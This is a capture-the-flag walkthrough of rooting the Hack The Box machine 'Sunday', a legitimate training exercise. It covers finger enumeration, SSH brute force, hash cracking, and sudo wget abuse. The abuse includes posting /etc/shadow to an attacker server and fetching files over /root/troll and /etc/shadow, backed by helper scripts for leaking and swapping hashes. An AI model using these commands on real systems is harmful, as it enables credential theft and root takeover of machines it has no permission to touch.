Linux Boxes

sunday

  1. nmap
    1. all ports
    2. targeted ports
  2. finger user enumeration
    1. usage
    2. scan report
      1. scan report on root
  3. ssh password brute force w/ patator & Hydra
    1. finding good password list
    2. sunny ssh_login bruteforce
  4. ssh sunny
    1. sudo -l
    2. ls /
    3. hashcat
      1. bruteforce
  5. sammy
    1. sudo -l /usr/bin/wget
      1. sudo wget -i /etc/shadow
      2. troll script
    2. privesc with /root/troll
      1. proof of overwrite /root/troll script on root
  6. potential shellshock (fail)
    1. assigning env variable to shellshock & testing
  7. privesc through wget etc/shadow
    1. wget upload.php
    2. upload.php
    3. useradd st0ve
      1. php server
      2. edit shadow
      3. wget shadow
      4. log into root
  8. privesc with /usr/bin/pfsh
  9. user/root
  10. lessons learned

sunday

images/548-1.png
images/548-2.png

nmap

images/549-1.png
Basic nmap scan shows:
port 79: finger service, version Sun Solaris fingerd
port 111: rpcbind 2-4

all ports

images/553-1.png

targetted ports

Let's target ports 79, 111, 22022, 33158 and 58398 with a focused service scan

images/554-1.png
the targeted scan shows an ssh service listening on port 22022!

finger user enumeration

There's a great enumeration tool pentestmonkey published called finger-user-enum; that's a good place for us to start
images/550-1.png
images/550-2.png
images/550-3.png

feel free to download it straight off GitHub or
images/550-4.png


or use git clone https://github.com/pentestmonkey/finger-user-enum.git to clone it
images/550-5.png

usage

finger-user-enum.pl usage
images/555-1.png

scan report

Pipe finger-user-enum through less -S to kill line wrapping and make the report easier to read

run it with the
names.txt wordlist from the SecLists github repo
images/556-1.png

We see that sammy and sunny stand out from the other hits: the rest look like system/service accounts, so it's safe to assume these two are the human users
images/556-2.png


images/556-3.png

scan report on root

we can also assume root exists on the sunday box, so let's query that user directly with finger-user-enum.pl

./finger-user-enum.pl -u root -t 10.10.10.76
images/557-1.png
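As an added example (not code from this writeup and not pentestmonkey's finger-user-enum), here is the exchange the tool drives, in Python: one TCP connection to port 79 per candidate name, the name plus CRLF as the request (RFC 1288), then read until the server closes. The parser assumes Solaris fingerd's reply shape, a "Login Name TTY ..." header followed by one line per match, with "???" in the Name column for a login it does not know; the two sample replies are constructed to that shape, not captured from the box.

```python
import socket

# Constructed sample replies shaped like Solaris fingerd output (not captured from the box).
SAMPLE_HIT = (
    "Login       Name               TTY         Idle    When    Where\n"
    "sunny    sunny                 pts/2        <Apr 24 10:48>10.10.14.4\n"
)
SAMPLE_MISS = (
    "Login       Name               TTY         Idle    When    Where\n"
    "nosuchuser          ???\n"
)


def finger_query(host, user, port=79, timeout=5.0):
    """One RFC 1288 query: send '<user>\\r\\n', read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_finger_reply(reply):
    """Logins that fingerd actually knows about.

    Skips the header line and the '???' placeholder Solaris prints for an
    unknown login (assumption: other fingerd builds may word this differently).
    """
    logins = []
    for line in reply.splitlines():
        fields = line.split()
        if len(fields) < 2 or fields[0] == "Login":
            continue
        if fields[1] == "???":
            continue
        logins.append(fields[0])
    return logins


def enumerate_users(host, candidates, port=79):
    """Query every candidate name and return the sorted set of confirmed logins.

    One query can return several lines (fingerd also matches on the Name
    column), so every login in each reply is collected.
    """
    confirmed = set()
    for name in candidates:
        try:
            reply = finger_query(host, name, port=port)
        except OSError:
            continue  # connection refused / timeout: skip this name
        confirmed.update(parse_finger_reply(reply))
    return sorted(confirmed)


if __name__ == "__main__":
    # e.g. python3 finger_enum.py 10.10.10.76 names.txt
    import sys
    with open(sys.argv[2]) as fh:
        names = [n.strip() for n in fh if n.strip()]
    for login in enumerate_users(sys.argv[1], names):
        print(login)
```

Because fingerd matches on the Name column as well as the login, a short candidate such as "sun" can reveal several accounts at once; that is why the parser collects every non-placeholder line rather than only the one matching the query.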

ssh password brute force w/ patator & Hydra

let's use patator to brute force an ssh login against a password list
note: hydra has ssh brute force capabilities too if you prefer, and I will list the equivalent hydra command in the subsequent notes

images/559-1.png
images/559-2.png

finding good password list

since rockyou.txt contains over 14 million passwords, let's use some simple find commands on our SecLists repo (if you don't have it you can grab it here) to find an effective, smaller wordlist to expedite our ssh brute force


/usr/share/seclists/Passwords/
images/563-1.png

we want a wordlist of roughly 1000-1500 common passwords, since rockyou has far too many for an online ssh_login brute force

let's use find . -type f -exec wc -l {} \; | sort -nr to list every file by line count, largest first
images/563-2.png
images/563-3.png

Let's use ./probable-v2-top1575.txt

sunny ssh_login bruteforce

Here's Patator's usage help as well as the bruteforce example it ships with, as a starting point:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
images/561-1.png


patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed'
images/561-2.png

images/561-3.png

bingo! patator flags password sunday for user sunny: every wrong guess produces the 'Authentication failed' message our -x ignore rule hides, so the one response without it is the hit
images/561-4.png

Here is the hydra equivalent ssh brute force:
hydra -l sunny -P /usr/share/wordlists/SecLists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh -s 22022
where -l is the single user sunny,
-P is the password list,
ssh is the service module to attack, and
-s is the port 22022 (default is 22)

images/561-5.png
hydra also finds sunny's password sunday for us!

ssh sunny

Let's first try to connect as sunny with our brute-forced password through sunday's ssh port on 22022
images/558-1.png
we get "Unable to negotiate ... no matching key exchange method found": the server only offers SHA-1 based key exchanges, which modern OpenSSH clients disable by default


thankfully the error lists the server's offer, so we know exactly what to re-enable:
gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==
diffie-hellman-group-exchange-sha1
diffie-hellman-group1-sha1


we need a matching key exchange method, and OpenSSH lets us add one back for a single connection:

use -oKexAlgorithms=+<algorithm> to specify which key exchange algorithm to enable (the + appends to the client's default list instead of replacing it)
(
diffie-hellman-group1-sha1 was simply easiest to type out)

caveat: OpenSSH clients 8.8 and later also refuse ssh-rsa host key signatures by default, so if the next error is "no matching host key type found", add -oHostKeyAlgorithms=+ssh-rsa as well

images/558-2.png
images/558-3.png


and we're logged in as sunny!
images/558-4.png

sudo -l

Let's issue sudo -l first to see what permissions sunny has:
images/564-1.png

sunny can run /root/troll as root without a password, but running the script by itself gives us nothing useful yet
images/564-2.png

ls /

images/565-1.png

the images/565-2.png directory is NOT a standard top-level directory, let's take a look at it:

images/565-3.png

Nice, there's a backup copy of /etc/shadow containing the password hashes for sunny and sammy
images/565-4.png

Let's save both hashes for hashcat (or CrackStation)
images/565-5.png
images/565-6.png

hashcat

first let's research which type of hash the passwords were stored with, going by the $5$ prefix:

images/566-1.png

we see it is sha256crypt, which is mode 7400 in hashcat

bruteforce

cracking hashes offline is much faster than guessing over ssh, so the full rockyou.txt works fine here:

images/567-1.png

images/567-2.png
images/567-3.png

Perfect! sammy's password cracks to cooldude!

sammy

let's switch user to sammy using the password cooldude we cracked:
images/569-1.png


images/569-2.png

sudo -l /usr/bin/wget

we can run wget with sudo privileges, interestingly enough:

images/571-1.png


Huge find: the -i argument makes wget read a list of URLs from a file, and since it runs as root it can read any file on the sunday box (including root-only ones) and echoes each line back to us inside an "Invalid URL" error!
images/571-2.png


images/571-3.png


sudo wget -i /etc/shadow

wget -i treats every line of the file as a URL; no line of /etc/shadow is a valid URL, so wget prints each one back in an error message, effectively leaking the file's contents to us. Let's start by reading sunday's /etc/shadow to try to crack root's hash
images/576-1.png

Let's make it easier on the eyes with awk (the shadow entry is the fourth whitespace-separated field of each error line, and the errors go to stderr, hence the 2>&1):
sudo wget -i /etc/shadow 2>&1 | awk '{print $4}'
images/576-2.png
now we have root's hash for a potential brute force:

looking up the $5$ prefix in hashcat's example hashes confirms it is sha256crypt, so we'll use mode 7400 for root as well
images/576-3.png
$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD

we'll save sunny, sammy and root's hashes in a text file for our hashcat run
images/576-4.png


hashcat -m 7400 hashes /usr/share/wordlists/rockyou.txt
images/576-5.png
unfortunately root's password is not in rockyou, so we need another way to root
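The leak-then-crack step above is worth automating, because a real shadow file mixes crackable hashes with locked system accounts and with schemes hashcat runs under different modes. The script below is an added example, not from the writeup: it pulls the shadow records back out of the wget error output, sorts them by hash scheme into one hashcat input file per mode, and sets aside accounts with no usable hash. The sample stderr is constructed to resemble wget's "Invalid URL" diagnostics (root's hash is the one shown above; the other hashes are placeholders, not real); the parser keys on the nine-field shadow record embedded in each line, not on wget's exact wording, so it also works on a plain shadow file.

```python
import re

# Modular-crypt prefixes and the hashcat modes that crack them.
CRYPT_MODES = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
}

# One shadow(4) record embedded in a line: nine colon-separated fields, no whitespace.
SHADOW_ENTRY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]*(?::[^:\s]*){8}")

# Constructed stderr in the shape of wget's "Invalid URL" diagnostics. root's hash is
# the one from the writeup; the sunny/sammy values are placeholders, not real hashes.
SAMPLE_WGET_STDERR = (
    "/etc/shadow: Invalid URL root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:17675::::::: Unsupported scheme\n"
    "/etc/shadow: Invalid URL daemon:NP:6445::::::: Unsupported scheme\n"
    "/etc/shadow: Invalid URL sunny:$5$saltsalt$CONSTRUCTED.PLACEHOLDER.NOT.A.REAL.HASH:17675::::::: Unsupported scheme\n"
    "/etc/shadow: Invalid URL nobody:*LK*:6445::::::: Unsupported scheme\n"
    "/etc/shadow: Invalid URL sammy:$6$saltsalt$CONSTRUCTED.PLACEHOLDER.NOT.A.REAL.HASH:17675::::::: Unsupported scheme\n"
)


def extract_shadow_entries(stderr_text):
    """Pull the shadow records back out of wget's error lines (one per line)."""
    entries = []
    for line in stderr_text.splitlines():
        match = SHADOW_ENTRY_RE.search(line)
        if match:
            entries.append(match.group(0))
    return entries


def classify_entries(entries):
    """Split records into hashcat-ready 'user:hash' lines per mode, locked accounts, unknown schemes."""
    crackable, locked, unknown = {}, [], []
    for entry in entries:
        user, secret = entry.split(":")[:2]
        # Solaris marks locked / passwordless system accounts with *LK* or NP;
        # Linux uses ! or *. None of these hold a crackable hash.
        if secret in ("", "NP") or secret.startswith(("!", "*")):
            locked.append(user)
            continue
        mode = next((m for prefix, (_, m) in CRYPT_MODES.items() if secret.startswith(prefix)), None)
        if mode is None:
            unknown.append(user)
            continue
        crackable.setdefault(mode, []).append(f"{user}:{secret}")
    return crackable, locked, unknown


def write_hashcat_inputs(crackable, prefix="hashes"):
    """Write one user:hash file per mode and return {mode: filename}.

    Crack each with: hashcat -m <mode> --username <file> rockyou.txt
    """
    written = {}
    for mode, lines in crackable.items():
        name = f"{prefix}_{mode}.txt"
        with open(name, "w") as fh:
            fh.write("\n".join(lines) + "\n")
        written[mode] = name
    return written


if __name__ == "__main__":
    import sys
    # usage: sudo wget -i /etc/shadow 2>&1 (copied to the attack box) | python3 shadow_leak.py
    text = sys.stdin.read() if len(sys.argv) < 2 else open(sys.argv[1]).read()
    crackable, locked, unknown = classify_entries(extract_shadow_entries(text))
    for mode, path in write_hashcat_inputs(crackable).items():
        print(f"mode {mode}: {len(crackable[mode])} hash(es) -> {path}")
    print("locked/no password:", ", ".join(locked) or "-")
    print("unrecognised scheme:", ", ".join(unknown) or "-")
```

Feeding hashcat the user:hash form with --username keeps the cracked password tied to the account name in the potfile, which matters once more than one hash is in play.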

troll script

if we run sudo wget -i /root/troll we can see the file is just a shell script that echoes
"testing"


images/578-1.png

we can try to replace it with a script that spawns a root shell

to do that we write our own troll script on the attacking machine and have sammy fetch it with sudo wget -O, writing the download over the original file's location:
images/578-2.png
images/578-3.png

spin up our http server...
images/578-4.png

and use wget to download it to our victim and execute it:
images/578-5.png

images/578-6.png

now to run it from sunny's session, since sunny is the user who can sudo this file:
images/578-7.png

we see it reverts back to the original script (something on the box restores /root/troll every few seconds), so the overwrite and the execution have to be timed closely; sleep lets us line the two up:



privesc with /root/troll

trick here is to run /root/troll as sunny within the 5 seconds before it gets rewritten

we use wget (as sammy, via sudo) to grab our troll script from the attacking box and write it over /root/troll, then run it as sunny immediately, inside the 5-second window before the box restores the original:

the sleep gives us time to switch terminals; run the script as soon as the GET shows up on our HTTP server:

Let's get the commands ready in two terminals (I like using terminator for a split shell environment but tmux is a great option as well if you're familiar with it)

sammy's session: sleep 5; sudo wget 10.10.14.62:8000/troll -O /root/troll
sunny's session: sudo /root/troll

images/579-1.png

VOILA! we got root on sunny
images/579-2.png


proof of overwrite /root/troll script on root

This is just proof that /root/troll was being restored every 5 seconds, so we had to be quick executing it as sunny:

images/583-1.png

potential shellshock (fail)

images/572-1.png
One thing worth noting is that the box dates from November 2008, and Shellshock (CVE-2014-6271, disclosed in 2014) affected bash releases going back many years, so a bash this old is vulnerable if we can get an attacker-controlled environment variable into a privileged bash; let's check:



first hop back onto user sunny
images/572-2.png

set a throwaway environment variable to the shellshock payload for a single command, like so:
VAR='() { :;}; <injected command>' <real cmd>
where <real cmd> is something that starts bash (e.g. bash -c 'echo real')

the shellshock trigger is the function-definition prefix () { :;}; (the space after () matters: a vulnerable bash only imports values that start with "() {"); whatever follows the closing }; runs when bash imports the variable
images/572-3.png


appears to be vulnerable! this is what calling echo would look like without the shellshock payload:
images/572-4.png

as we can see the injected echo doesn't execute

assigning env variable to shellshock & testing

sudo -l doesn't list any env_keep variables, so sudo's env_reset will strip most of our environment before running /root/troll; we're going to pick one anyway:

images/573-1.png

try one we think reaches the script unchanged:
LOGNAME
(caveat: with env_reset sudo actually initialises LOGNAME and USER to the target user, which is one reason this attempt fails)


The box is shellshock vulnerable through sudo if we see the injected echo output when we call sudo /root/troll
images/573-2.png
Booo! the box is not vulnerable to shellshock through sudo

privesc through wget etc/shadow

let's use wget to send the victim's /etc/shadow to our attacking machine, edit it there, and then pull it back over /etc/shadow so we can log into root with a known password

check wget -h for a way to PUT files
images/581-1.png
images/581-2.png

unfortunately there's no option for a PUT request.... but --post-file sends a file as the body of a POST, so if we write a script on our attacking machine that handles POSTed files we get the same result

let's set up a listener (nc) on our machine first and --post-file /etc/shadow to it from sammy with sudo
images/581-3.png

images/581-4.png

images/581-5.png

wget upload.php

now instead of just posting to a raw listener, let's post to a script we create that we'll call upload.php, with the filename passed as a query argument

images/585-1.png

now we're handling a POST request with an argument and a file attached... we can work with this
images/585-2.png

upload.php

images/587-1.png
images/587-2.png
there are several vulnerabilities with this script: a caller can escape our 'upload/' directory with a "../" filename, upload a script and execute it...

we can reduce that by rejecting filenames containing "../" (or any path separator) so the caller can't escape our directory, and by running the server as an unprivileged user with tight permissions on the upload directory

images/587-3.png
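To make the hardening concrete, here is an added example of the receiver in Python (a stand-in for the page's upload.php; it is not the writeup's code). It accepts exactly what wget --post-file sends, a POST whose body is the raw file, with the target name in the query string, and it closes the holes just described: the name is validated so it can only land directly inside the upload directory (no separators, no "..", no hidden files, and a realpath check so a planted symlink cannot redirect the write), the body is size-capped, and the file is created with O_EXCL and mode 0600 so an upload can neither overwrite an existing file nor arrive executable. The directory name, port and query parameter are assumptions for the example.

```python
import os
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

UPLOAD_DIR = os.path.abspath("upload")  # assumed: ./upload, owned by an unprivileged user
MAX_BODY = 1 << 20                       # 1 MiB is plenty for a shadow file


def safe_upload_path(upload_dir, name):
    """Map a client-supplied name onto a file directly inside upload_dir.

    Raises ValueError on anything that could leave the directory: empty or
    hidden names, NULs, path separators, '.'/'..', and a symlink already in
    the directory that points elsewhere (caught by the realpath comparison).
    """
    if not name or "\x00" in name or "/" in name or "\\" in name or name.startswith("."):
        raise ValueError("bad filename")
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        raise ValueError("path escapes upload dir")
    return target


def is_safe_name(upload_dir, name):
    """Boolean convenience wrapper around safe_upload_path."""
    try:
        safe_upload_path(upload_dir, name)
        return True
    except ValueError:
        return False


class UploadHandler(BaseHTTPRequestHandler):
    """POST /upload?name=<file> with the raw file as the body (what wget --post-file sends)."""

    def do_POST(self):
        name = parse_qs(urlparse(self.path).query).get("name", [""])[0]
        try:
            length = int(self.headers.get("Content-Length", "0"))
        except ValueError:
            length = -1
        if length <= 0 or length > MAX_BODY:
            self.send_error(413, "missing or oversized body")
            return
        try:
            target = safe_upload_path(UPLOAD_DIR, name)
        except ValueError as exc:
            self.send_error(400, str(exc))
            return
        body = self.rfile.read(length)
        try:
            # O_EXCL: never overwrite an existing file; 0o600: not executable, not world-readable
            fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        except FileExistsError:
            self.send_error(409, "file exists")
            return
        with os.fdopen(fd, "wb") as fh:
            fh.write(body)
        self.send_response(201)
        self.end_headers()
        self.wfile.write(b"stored\n")


if __name__ == "__main__":
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    HTTPServer(("0.0.0.0", 8000), UploadHandler).serve_forever()
```

From the victim the matching request is sudo wget --post-file=/etc/shadow -O - "http://10.10.14.62:8000/upload?name=shadow"; run the receiver as the unprivileged user that owns upload/, as the next section does for the PHP version.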

useradd st0ve

we don't want exploitable code running as root on our attacking machine, so we're going to add a user with limited permissions

images/586-1.png

set st0ve to own the upload folder with chown st0ve upload/
images/586-2.png

chmod 222 on test so it is write-only (nobody besides root can read it back):
images/586-3.pngimages/586-4.png

php server

php's built-in web server (php -S) both serves and executes php files; it's less commonly used than python -m SimpleHTTPServer (which only serves static files) but works great here
images/588-1.png is the command

images/588-2.png

Now we can --post-file /etc/shadow to our IP with the name shadow, which creates the file shadow
images/588-3.png

this stores shadow in our /upload directory images/588-4.png
images/588-5.png

edit shadow

before:
images/590-1.png

after overwriting root's hash field with sammy's (the rest of root's entry is left alone)
images/590-2.png


finally change the shadow file permissions so st0ve (or the user you created) can write to it:
images/590-3.png
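Editing the file by hand works, but it is easy to clobber a neighbouring field or line. As an added example (not part of the writeup), the function below makes exactly the one change described above: it copies the donor user's password field into the target user's record and leaves every other field, line and ordering untouched, refusing to proceed if the donor has no crypt hash to copy (a locked or NP account). The sample shadow is constructed; its hashes are placeholders, not real.

```python
# Constructed shadow file: the hashes are placeholders, not real password hashes.
SAMPLE_SHADOW = (
    "root:$5$saltsalt$ROOT.PLACEHOLDER.NOT.A.REAL.HASH:17675::::::\n"
    "daemon:NP:6445::::::\n"
    "sunny:$5$saltsalt$SUNNY.PLACEHOLDER.NOT.A.REAL.HASH:17675::::::\n"
    "sammy:$5$saltsalt$SAMMY.PLACEHOLDER.NOT.A.REAL.HASH:17675::::::\n"
)

FIELDS = 9  # shadow(4): name, password, lastchg, min, max, warn, inactive, expire, flag


def hash_for(shadow_text, user):
    """Password field of `user`, or KeyError if there is no well-formed record for it."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) == FIELDS and fields[0] == user:
            return fields[1]
    raise KeyError(user)


def replace_password_hash(shadow_text, target_user, donor_user):
    """Return shadow_text with target_user's password field set to donor_user's.

    Only that one field changes; every other field and line (including
    malformed ones) is passed through unchanged, so the file stays valid.
    """
    donor_hash = hash_for(shadow_text, donor_user)
    if not donor_hash.startswith("$"):
        raise ValueError(f"{donor_user} has no crypt hash to copy (got {donor_hash!r})")
    out, replaced = [], False
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) == FIELDS and fields[0] == target_user:
            fields[1] = donor_hash
            line = ":".join(fields)
            replaced = True
        out.append(line)
    if not replaced:
        raise KeyError(target_user)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    import sys
    # python3 swap_hash.py upload/shadow root sammy > php/shadow
    with open(sys.argv[1]) as fh:
        sys.stdout.write(replace_password_hash(fh.read(), sys.argv[2], sys.argv[3]))
```

Copying a hash rather than inventing one also sidesteps a portability trap: the donor hash was produced by this box's own crypt, so it is guaranteed to use a scheme the box can verify.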

wget shadow

lastly we download our edited shadow file over the victim's /etc/shadow

first copy our shadow file down a level into /php/ (or make a new directory within your Sunday directory) so the web server can serve it
images/591-1.png

images/591-2.png


Success!
images/591-3.png

log into root

now we can switch user to root using sammy's password, cooldude!

and we're in!

images/592-1.png


privesc with /usr/bin/pfsh

I don't know if this was intended, but /usr/bin/pfsh is Solaris's profile shell (the shell form of pfexec): commands run in it pick up the RBAC profiles assigned to the user, and here that is enough to get root

images/589-1.png


user/root

images/582-1.png
a3d9498027ca5187ba1793943ee8a598

images/582-2.png
fb40fab61d99d37536daeec0d97af9b8

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1965-1.png


1. Fun box where you enumerate users on the finger service the box runs, and find it has ssh on an uncommon port
2. from there you get the sunny user by either guessing their password or using an ssh brute force program like patator
3. you hop on sunny and see it can run a file called /root/troll as root without a sudo password, and that there is a backup directory with an old /etc/shadow copy
4. you can crack user sammy's hash from the old /etc/shadow copy using hashcat
5. from there you notice sammy can run wget as root without a password, so there are two main ways I showed to priv esc: use sunny/sammy together to rewrite /root/troll, OR re-upload an edited /etc/shadow to the box with sammy from your attacking machine and log into root with a known password